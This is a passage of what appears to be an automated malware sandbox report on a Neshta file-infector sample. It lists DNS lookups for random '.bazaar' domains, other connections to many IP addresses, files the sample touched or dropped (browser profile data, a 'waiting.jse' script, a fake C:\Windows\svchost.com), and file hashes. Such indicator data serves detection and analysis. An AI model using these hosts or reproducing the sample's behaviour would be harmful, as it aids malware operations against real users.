| US | 206.51.202.106:50003 | tcp | |
| GB | 159.89.249.249:53 | `beghkzcgghq.bazaar | udp |
| GB | 104.238.186.189:53 | `beghkzcgghq.bazaar | udp |
| IN | 139.59.23.241:53 | `beghkzcgghq.bazaar | udp |
| IT | 193.183.98.66:53 | `beghkzcgghq.bazaar | udp |
| IT | 94.177.171.127:53 | `beghkzcgghq.bazaar | udp |
| JP | 45.63.124.65:53 | `beghkzcgghq.bazaar | udp |
| LT | 212.24.98.54:53 | `beghkzcgghq.bazaar | udp |
| AR | 152.169.22.67:80 | tcp | |
| MD | 178.17.170.179:53 | `beghkzcgghq.bazaar | udp |
| NL | 185.208.208.141:53 | `beghkzcgghq.bazaar | udp |
| NL | 82.196.9.45:53 | `beghkzcgghq.bazaar | udp |
| NL | 146.185.176.36:53 | `beghkzcgghq.bazaar | udp |
| SE | 89.35.39.64:53 | `beghkzcgghq.bazaar | udp |
| RO | 89.18.27.167:53 | `beghkzcgghq.bazaar | udp |
| RU | 77.73.68.161:53 | `beghkzcgghq.bazaar | udp |
| RU | 91.217.137.37:53 | `beghkzcgghq.bazaar | udp |
| RU | 185.117.154.144:53 | `beghkzcgghq.bazaar | udp |
| SE | 176.126.70.119:53 | `beghkzcgghq.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| SG | 139.99.96.146:53 | `beghkzcgghq.bazaar | udp |
| US | 206.51.202.106:50003 | tcp | |
| UA | 217.12.210.54:53 | `beghkzcgghq.bazaar | udp |
| GB | 185.164.136.225:53 | `beghkzcgghq.bazaar | udp |
| US | 192.52.166.110:53 | `beghkzcgghq.bazaar | udp |
| US | 63.231.92.27:53 | `beghkzcgghq.bazaar | udp |
| CA | 66.70.211.246:53 | `beghkzcgghq.bazaar | udp |
| US | 96.47.228.108:53 | `beghkzcgghq.bazaar | udp |
| US | 45.32.160.206:53 | `beghkzcgghq.bazaar | udp |
| US | 128.52.130.209:53 | `beghkzcgghq.bazaar | udp |
| US | 35.196.105.24:53 | `beghkzcgghq.bazaar | udp |
| US | 172.98.193.42:53 | `beghkzcgghq.bazaar | udp |
| US | 162.248.241.94:53 | `beghkzcgghq.bazaar | udp |
| US | 107.172.42.186:53 | `beghkzcgghq.bazaar | udp |
| US | 167.99.153.82:53 | `beghkzcgghq.bazaar | udp |
| US | 138.197.25.214:53 | `beghkzcgghq.bazaar | udp |
| US | 69.164.196.21:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.254.25.115:53 | `efgjmzfhgjs.bazaar | udp |
| IT | 193.183.98.66:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 91.217.137.37:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 87.98.175.85:53 | `efgjmzfhgjs.bazaar | udp |
| AT | 185.121.177.177:53 | `efgjmzfhgjs.bazaar | udp |
| ZA | 169.239.202.202:53 | `efgjmzfhgjs.bazaar | udp |
| US | 198.251.90.143:53 | `efgjmzfhgjs.bazaar | udp |
| AT | 5.132.191.104:53 | `efgjmzfhgjs.bazaar | udp |
| AU | 111.67.20.8:53 | `efgjmzfhgjs.bazaar | udp |
| AU | 163.53.248.170:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 142.4.204.111:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 142.4.205.47:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 158.69.239.167:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 104.37.195.178:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 192.99.85.244:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 158.69.160.164:53 | `efgjmzfhgjs.bazaar | udp |
| CH | 46.28.207.199:53 | `efgjmzfhgjs.bazaar | udp |
| CH | 31.171.251.118:53 | `efgjmzfhgjs.bazaar | udp |
| CZ | 81.2.241.148:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.254.25.115:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 82.141.39.32:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 50.3.82.215:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 46.101.70.183:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 5.45.97.127:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 130.255.78.223:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 144.76.133.38:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 139.59.208.246:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 172.104.136.243:53 | `efgjmzfhgjs.bazaar | udp |
| EC | 45.71.112.70:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 163.172.185.51:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 87.98.175.85:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 5.135.183.146:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.255.48.78:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 188.165.200.156:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 147.135.185.78:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 92.222.97.145:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.255.211.146:53 | `efgjmzfhgjs.bazaar | udp |
| GB | 159.89.249.249:53 | `efgjmzfhgjs.bazaar | udp |
| GB | 104.238.186.189:53 | `efgjmzfhgjs.bazaar | udp |
| IN | 139.59.23.241:53 | `efgjmzfhgjs.bazaar | udp |
| IT | 193.183.98.66:53 | `efgjmzfhgjs.bazaar | udp |
| IT | 94.177.171.127:53 | `efgjmzfhgjs.bazaar | udp |
| JP | 45.63.124.65:53 | `efgjmzfhgjs.bazaar | udp |
| LT | 212.24.98.54:53 | `efgjmzfhgjs.bazaar | udp |
| MD | 178.17.170.179:53 | `efgjmzfhgjs.bazaar | udp |
| NL | 185.208.208.141:53 | `efgjmzfhgjs.bazaar | udp |
| NL | 82.196.9.45:53 | `efgjmzfhgjs.bazaar | udp |
| NL | 146.185.176.36:53 | `efgjmzfhgjs.bazaar | udp |
| SE | 89.35.39.64:53 | `efgjmzfhgjs.bazaar | udp |
| RO | 89.18.27.167:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 77.73.68.161:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 91.217.137.37:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 185.117.154.144:53 | `efgjmzfhgjs.bazaar | udp |
| SE | 176.126.70.119:53 | `efgjmzfhgjs.bazaar | udp |
| SG | 139.99.96.146:53 | `efgjmzfhgjs.bazaar | udp |
| UA | 217.12.210.54:53 | `efgjmzfhgjs.bazaar | udp |
| GB | 185.164.136.225:53 | `efgjmzfhgjs.bazaar | udp |
| US | 192.52.166.110:53 | `efgjmzfhgjs.bazaar | udp |
| US | 63.231.92.27:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 66.70.211.246:53 | `efgjmzfhgjs.bazaar | udp |
| US | 96.47.228.108:53 | `efgjmzfhgjs.bazaar | udp |
| US | 45.32.160.206:53 | `efgjmzfhgjs.bazaar | udp |
| US | 128.52.130.209:53 | `efgjmzfhgjs.bazaar | udp |
| US | 35.196.105.24:53 | `efgjmzfhgjs.bazaar | udp |
| US | 172.98.193.42:53 | `efgjmzfhgjs.bazaar | udp |
| US | 162.248.241.94:53 | `efgjmzfhgjs.bazaar | udp |
| US | 107.172.42.186:53 | `efgjmzfhgjs.bazaar | udp |
| US | 167.99.153.82:53 | `efgjmzfhgjs.bazaar | udp |
| US | 138.197.25.214:53 | `efgjmzfhgjs.bazaar | udp |
| US | 69.164.196.21:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.254.25.115:53 | bcegkkbdggkq.bazaar | udp |
| IT | 193.183.98.66:53 | bcegkkbdggkq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| RU | 91.217.137.37:53 | bcegkkbdggkq.bazaar | udp |
| FR | 87.98.175.85:53 | bcegkkbdggkq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| UA | 91.219.169.180:80 | tcp | |
| AT | 185.121.177.177:53 | bcegkkbdggkq.bazaar | udp |
| ZA | 169.239.202.202:53 | bcegkkbdggkq.bazaar | udp |
| US | 198.251.90.143:53 | bcegkkbdggkq.bazaar | udp |
| AT | 5.132.191.104:53 | bcegkkbdggkq.bazaar | udp |
| AU | 111.67.20.8:53 | bcegkkbdggkq.bazaar | udp |
| AU | 163.53.248.170:53 | bcegkkbdggkq.bazaar | udp |
| CA | 142.4.204.111:53 | bcegkkbdggkq.bazaar | udp |
| CA | 142.4.205.47:53 | bcegkkbdggkq.bazaar | udp |
| CA | 158.69.239.167:53 | bcegkkbdggkq.bazaar | udp |
| CA | 104.37.195.178:53 | bcegkkbdggkq.bazaar | udp |
| CA | 192.99.85.244:53 | bcegkkbdggkq.bazaar | udp |
| CA | 158.69.160.164:53 | bcegkkbdggkq.bazaar | udp |
| CH | 46.28.207.199:53 | bcegkkbdggkq.bazaar | udp |
| US | 76.111.128.194:443 | tcp | |
| CH | 31.171.251.118:53 | bcegkkbdggkq.bazaar | udp |
| CZ | 81.2.241.148:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.254.25.115:53 | bcegkkbdggkq.bazaar | udp |
| DE | 82.141.39.32:53 | bcegkkbdggkq.bazaar | udp |
| DE | 50.3.82.215:53 | bcegkkbdggkq.bazaar | udp |
| DE | 46.101.70.183:53 | bcegkkbdggkq.bazaar | udp |
| DE | 5.45.97.127:53 | bcegkkbdggkq.bazaar | udp |
| DE | 130.255.78.223:53 | bcegkkbdggkq.bazaar | udp |
| DE | 144.76.133.38:53 | bcegkkbdggkq.bazaar | udp |
| DE | 139.59.208.246:53 | bcegkkbdggkq.bazaar | udp |
| DE | 172.104.136.243:53 | bcegkkbdggkq.bazaar | udp |
| EC | 45.71.112.70:53 | bcegkkbdggkq.bazaar | udp |
| IN | 157.245.99.39:8080 | tcp | |
| FR | 163.172.185.51:53 | bcegkkbdggkq.bazaar | udp |
| FR | 87.98.175.85:53 | bcegkkbdggkq.bazaar | udp |
| FR | 5.135.183.146:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.255.48.78:53 | bcegkkbdggkq.bazaar | udp |
| FR | 188.165.200.156:53 | bcegkkbdggkq.bazaar | udp |
| FR | 147.135.185.78:53 | bcegkkbdggkq.bazaar | udp |
| FR | 92.222.97.145:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.255.211.146:53 | bcegkkbdggkq.bazaar | udp |
| US | 76.111.128.194:443 | tcp | |
| GB | 159.89.249.249:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.255.165.160:8080 | tcp | |
| GB | 104.238.186.189:53 | bcegkkbdggkq.bazaar | udp |
| IN | 139.59.23.241:53 | bcegkkbdggkq.bazaar | udp |
| IT | 193.183.98.66:53 | bcegkkbdggkq.bazaar | udp |
| IT | 94.177.171.127:53 | bcegkkbdggkq.bazaar | udp |
| JP | 45.63.124.65:53 | bcegkkbdggkq.bazaar | udp |
| LT | 212.24.98.54:53 | bcegkkbdggkq.bazaar | udp |
| MD | 178.17.170.179:53 | bcegkkbdggkq.bazaar | udp |
| NL | 185.208.208.141:53 | bcegkkbdggkq.bazaar | udp |
| US | 76.27.179.47:80 | tcp | |
| NL | 82.196.9.45:53 | bcegkkbdggkq.bazaar | udp |
| NL | 146.185.176.36:53 | bcegkkbdggkq.bazaar | udp |
| SE | 89.35.39.64:53 | bcegkkbdggkq.bazaar | udp |
| RO | 89.18.27.167:53 | bcegkkbdggkq.bazaar | udp |
| RU | 77.73.68.161:53 | bcegkkbdggkq.bazaar | udp |
| RU | 91.217.137.37:53 | bcegkkbdggkq.bazaar | udp |
| RU | 185.117.154.144:53 | bcegkkbdggkq.bazaar | udp |
| SE | 176.126.70.119:53 | bcegkkbdggkq.bazaar | udp |
| SG | 139.99.96.146:53 | bcegkkbdggkq.bazaar | udp |
| UA | 217.12.210.54:53 | bcegkkbdggkq.bazaar | udp |
| GB | 185.164.136.225:53 | bcegkkbdggkq.bazaar | udp |
| US | 192.52.166.110:53 | bcegkkbdggkq.bazaar | udp |
| US | 63.231.92.27:53 | bcegkkbdggkq.bazaar | udp |
| CA | 66.70.211.246:53 | bcegkkbdggkq.bazaar | udp |
| US | 96.47.228.108:53 | bcegkkbdggkq.bazaar | udp |
| US | 45.32.160.206:53 | bcegkkbdggkq.bazaar | udp |
| US | 128.52.130.209:53 | bcegkkbdggkq.bazaar | udp |
| US | 35.196.105.24:53 | bcegkkbdggkq.bazaar | udp |
| US | 172.98.193.42:53 | bcegkkbdggkq.bazaar | udp |
| US | 162.248.241.94:53 | bcegkkbdggkq.bazaar | udp |
| US | 107.172.42.186:53 | bcegkkbdggkq.bazaar | udp |
| US | 167.99.153.82:53 | bcegkkbdggkq.bazaar | udp |
| US | 138.197.25.214:53 | bcegkkbdggkq.bazaar | udp |
| US | 69.164.196.21:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.254.25.115:53 | dechkjdfehkp.bazaar | udp |
| IT | 193.183.98.66:53 | dechkjdfehkp.bazaar | udp |
| RU | 91.217.137.37:53 | dechkjdfehkp.bazaar | udp |
| FR | 87.98.175.85:53 | dechkjdfehkp.bazaar | udp |
| AT | 185.121.177.177:53 | dechkjdfehkp.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| US | 76.111.128.194:443 | tcp | |
| ZA | 169.239.202.202:53 | dechkjdfehkp.bazaar | udp |
| US | 198.251.90.143:53 | dechkjdfehkp.bazaar | udp |
| AT | 5.132.191.104:53 | dechkjdfehkp.bazaar | udp |
| AU | 111.67.20.8:53 | dechkjdfehkp.bazaar | udp |
| AU | 163.53.248.170:53 | dechkjdfehkp.bazaar | udp |
| CA | 142.4.204.111:53 | dechkjdfehkp.bazaar | udp |
| CA | 142.4.205.47:53 | dechkjdfehkp.bazaar | udp |
| CA | 158.69.239.167:53 | dechkjdfehkp.bazaar | udp |
| CA | 104.37.195.178:53 | dechkjdfehkp.bazaar | udp |
| CA | 192.99.85.244:53 | dechkjdfehkp.bazaar | udp |
| BR | 170.81.48.2:80 | tcp | |
| CA | 158.69.160.164:53 | dechkjdfehkp.bazaar | udp |
| CH | 46.28.207.199:53 | dechkjdfehkp.bazaar | udp |
| CH | 31.171.251.118:53 | dechkjdfehkp.bazaar | udp |
| CZ | 81.2.241.148:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.254.25.115:53 | dechkjdfehkp.bazaar | udp |
| DE | 82.141.39.32:53 | dechkjdfehkp.bazaar | udp |
| DE | 50.3.82.215:53 | dechkjdfehkp.bazaar | udp |
| DE | 46.101.70.183:53 | dechkjdfehkp.bazaar | udp |
| DE | 5.45.97.127:53 | dechkjdfehkp.bazaar | udp |
| DE | 130.255.78.223:53 | dechkjdfehkp.bazaar | udp |
| DE | 144.76.133.38:53 | dechkjdfehkp.bazaar | udp |
| DE | 139.59.208.246:53 | dechkjdfehkp.bazaar | udp |
| DE | 172.104.136.243:53 | dechkjdfehkp.bazaar | udp |
| EC | 45.71.112.70:53 | dechkjdfehkp.bazaar | udp |
| FR | 163.172.185.51:53 | dechkjdfehkp.bazaar | udp |
| FR | 87.98.175.85:53 | dechkjdfehkp.bazaar | udp |
| FR | 5.135.183.146:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.255.48.78:53 | dechkjdfehkp.bazaar | udp |
| FR | 188.165.200.156:53 | dechkjdfehkp.bazaar | udp |
| FR | 147.135.185.78:53 | dechkjdfehkp.bazaar | udp |
| FR | 92.222.97.145:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.255.211.146:53 | dechkjdfehkp.bazaar | udp |
| GB | 159.89.249.249:53 | dechkjdfehkp.bazaar | udp |
| GB | 104.238.186.189:53 | dechkjdfehkp.bazaar | udp |
| IN | 139.59.23.241:53 | dechkjdfehkp.bazaar | udp |
| IT | 193.183.98.66:53 | dechkjdfehkp.bazaar | udp |
| IT | 94.177.171.127:53 | dechkjdfehkp.bazaar | udp |
| JP | 45.63.124.65:53 | dechkjdfehkp.bazaar | udp |
| LT | 212.24.98.54:53 | dechkjdfehkp.bazaar | udp |
| MD | 178.17.170.179:53 | dechkjdfehkp.bazaar | udp |
| NL | 185.208.208.141:53 | dechkjdfehkp.bazaar | udp |
| NL | 82.196.9.45:53 | dechkjdfehkp.bazaar | udp |
| NL | 146.185.176.36:53 | dechkjdfehkp.bazaar | udp |
| SE | 89.35.39.64:53 | dechkjdfehkp.bazaar | udp |
| RO | 89.18.27.167:53 | dechkjdfehkp.bazaar | udp |
| RU | 77.73.68.161:53 | dechkjdfehkp.bazaar | udp |
| RU | 91.217.137.37:53 | dechkjdfehkp.bazaar | udp |
| RU | 185.117.154.144:53 | dechkjdfehkp.bazaar | udp |
| SE | 176.126.70.119:53 | dechkjdfehkp.bazaar | udp |
| SG | 139.99.96.146:53 | dechkjdfehkp.bazaar | udp |
| UA | 217.12.210.54:53 | dechkjdfehkp.bazaar | udp |
| GB | 185.164.136.225:53 | dechkjdfehkp.bazaar | udp |
| US | 192.52.166.110:53 | dechkjdfehkp.bazaar | udp |
| US | 63.231.92.27:53 | dechkjdfehkp.bazaar | udp |
| CA | 66.70.211.246:53 | dechkjdfehkp.bazaar | udp |
| US | 96.47.228.108:53 | dechkjdfehkp.bazaar | udp |
| US | 45.32.160.206:53 | dechkjdfehkp.bazaar | udp |
| US | 128.52.130.209:53 | dechkjdfehkp.bazaar | udp |
| US | 35.196.105.24:53 | dechkjdfehkp.bazaar | udp |
| US | 172.98.193.42:53 | dechkjdfehkp.bazaar | udp |
| US | 162.248.241.94:53 | dechkjdfehkp.bazaar | udp |
| US | 107.172.42.186:53 | dechkjdfehkp.bazaar | udp |
| US | 167.99.153.82:53 | dechkjdfehkp.bazaar | udp |
| US | 138.197.25.214:53 | dechkjdfehkp.bazaar | udp |
| US | 69.164.196.21:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.254.25.115:53 | `achikzbehiq.bazaar | udp |
| IT | 193.183.98.66:53 | `achikzbehiq.bazaar | udp |
| RU | 91.217.137.37:53 | `achikzbehiq.bazaar | udp |
| FR | 87.98.175.85:53 | `achikzbehiq.bazaar | udp |
| AT | 185.121.177.177:53 | `achikzbehiq.bazaar | udp |
| US | 76.111.128.194:443 | tcp | |
| ZA | 169.239.202.202:53 | `achikzbehiq.bazaar | udp |
| US | 198.251.90.143:53 | `achikzbehiq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| AT | 5.132.191.104:53 | `achikzbehiq.bazaar | udp |
| AU | 111.67.20.8:53 | `achikzbehiq.bazaar | udp |
| AU | 163.53.248.170:53 | `achikzbehiq.bazaar | udp |
| CA | 142.4.204.111:53 | `achikzbehiq.bazaar | udp |
| CA | 142.4.205.47:53 | `achikzbehiq.bazaar | udp |
| CA | 158.69.239.167:53 | `achikzbehiq.bazaar | udp |
| CA | 104.37.195.178:53 | `achikzbehiq.bazaar | udp |
| CA | 192.99.85.244:53 | `achikzbehiq.bazaar | udp |
| CA | 158.69.160.164:53 | `achikzbehiq.bazaar | udp |
| CH | 46.28.207.199:53 | `achikzbehiq.bazaar | udp |
| CH | 31.171.251.118:53 | `achikzbehiq.bazaar | udp |
| CZ | 81.2.241.148:53 | `achikzbehiq.bazaar | udp |
| FR | 51.254.25.115:53 | `achikzbehiq.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| DE | 82.141.39.32:53 | `achikzbehiq.bazaar | udp |
| DE | 50.3.82.215:53 | `achikzbehiq.bazaar | udp |
| DE | 46.101.70.183:53 | `achikzbehiq.bazaar | udp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\pending_pings\27648147-adbb-4d74-a5e2-23ddd665ec8a
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\pending_pings\bf1f157a-5f39-49cf-bce4-6d9ee6659a5a
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\AlternateServices.bin
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\pending_pings\0af248ac-8e8d-4aad-b89b-d9afa8973bfd
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\prefs.js
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\maevrvll.default-release\activity-stream.discovery_stream.json
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\maevrvll.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\prefs-1.js
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\maevrvll.default-release\cache2\entries\0EA2E1AC3653A248EDE38E975FF2A4ADDA308244
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\AlternateServices.bin
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
C:\Users\Admin\AppData\Local\Temp\tmpaddon-2
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\maevrvll.default-release\datareporting\glean\db\data.safe.tmp
\??\pipe\crashpad_3012_BMDVBZNZOFYOWULF
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Temp\7zO4E8D6D39\waiting.jse
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
C:\Users\Public\Video\frame.exe
C:\Windows\svchost.com
C:\Users\Public\Video\lphsi.exe
C:\Windows\directx.sys
C:\Users\Public\Video\hrss.exe
C:\Users\Public\Video\movie.mp4
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe
C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe
C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge.exe
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE
C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE
C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE
C:\PROGRA~2\Google\Update\DISABL~1.EXE
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\BHO\ie_to_edge_stub.exe
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedgewebview2.exe
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\Installer\setup.exe
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\identity_helper.exe
| MD5 | 105512023f579c681bbf55f4f88a2ded |
| SHA1 | 2b7e3fb82461924e2afa09cf778da484605cb855 |
| SHA256 | bbdb39a2dec157d2a571101338907d3ce6b6b4122ee077644cd1285ccb0515b0 |
| SHA512 | 0aeacf1bd617722c29dcd763208c20e89d90cff4c43a478f1292ef0964a3172fcc22cc2b1850ec68981c4760674e68f804bf3bba2155d9bbf9c7aa38f7394985 |
C:\PROGRA~2\MICROS~1\Edge\Application\pwahelper.exe
| MD5 | ae233c9a94ac29078a9b84a0e2f21d0e |
| SHA1 | 74352f8a9f95dac8d4149592f2ca5cafa3f22df5 |
| SHA256 | d351a76537354ee30c5c229ce5ad7684befc6aeac30dbf8c38c03f7780c9ab87 |
| SHA512 | 4985561bd596b002849f3c840b04b5443385f3eb6ba3e1016090a6623b61b0143c4cc928f2b5aa95a70fda8363359ebbdcdd89a5521e90e93aa1c17903ac4109 |
C:\PROGRA~2\MICROS~1\Edge\Application\msedge_proxy.exe
| MD5 | a504bdfc2f71c8040cb5b6c743d32f34 |
| SHA1 | e693d0844f6a6c7d82a70e289f99c62a216dd13a |
| SHA256 | 8ba67958788de5da6de9288f1bb6d2b73f57cc88534359a9a627063e86fcb076 |
| SHA512 | 0ac11251e930ffb1ca965c7f584fcd64d9a2432e248b6d98847e10b67c80482a0591f663f046b7d6add34160bc2deedaf89313a5a6f2cccfa395264c193c4f89 |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\notification_helper.exe
| MD5 | 40309a97594ecfed9e8cd0368b51f002 |
| SHA1 | 8a1ca73a3ee107c1f172877a21f2e8b6a5c30f54 |
| SHA256 | 48e26052483e4981461c09644924f28464019919cc740cece6069adb71c3be48 |
| SHA512 | 359d44547d0cb2c5fa403cc2e1e860bd502db6066a6e09871a047edfaa4ee9449415cbe6ce32a13eb3276fa7f13bd4397572a4439989b080aa4c3ff1c8adcbca |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_pwa_launcher.exe
| MD5 | 34d0a4d388738301876a910823dfcb8a |
| SHA1 | 46849a3f21432aceb23b403ce4a3625a45d1b7d2 |
| SHA256 | dbb4397b616325e5484d4d26836d4e1da826e83be51b1ebf59c758bf5bd58a34 |
| SHA512 | ed65ecca79d99824d289bba7e77dd714087ad34536aaf95648b31d93d28d5ecb8b42c776332651c98ffb02c18a9b9e792f0293ded46051ff4def050efeb95c3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d9fd8f4dfe01ed17c0160d2725992615 |
| SHA1 | 10d9b0233a1058a2dcfc0a36536810d6473ad9a2 |
| SHA256 | bee45e1f3f4cc09ab72aea611c0e5139e4f423ddf10e6be33dc8e14f75653ec9 |
